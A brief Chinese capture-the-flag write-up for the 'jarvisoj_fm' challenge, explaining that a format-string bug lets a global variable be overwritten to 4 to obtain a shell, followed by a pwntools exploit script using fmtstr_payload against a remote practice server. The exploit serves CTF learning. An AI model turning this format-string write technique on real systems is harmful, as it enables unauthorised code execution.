jarvisoj_fm

jarvisoj_fm

查看保护
jarvisoj_fm
jarvisoj_fm
当x==4时可以getshell。需要做的就是将x的值改为4就可以了。这里有一个格式化漏洞,32位程序的话直接借助pwntools的工具来就可以了。

from pwn import *

context(arch='i386', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 29406)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

offest = 11

data_addr = 0x804A02C

p1 = fmtstr_payload(offest, {data_addr : 4})
r.sendline(p1)

r.interactive()
上一篇:《基于Web课表管理系统开发》论文笔记(十三)


下一篇:[NOIP 2013] 货车运输 题解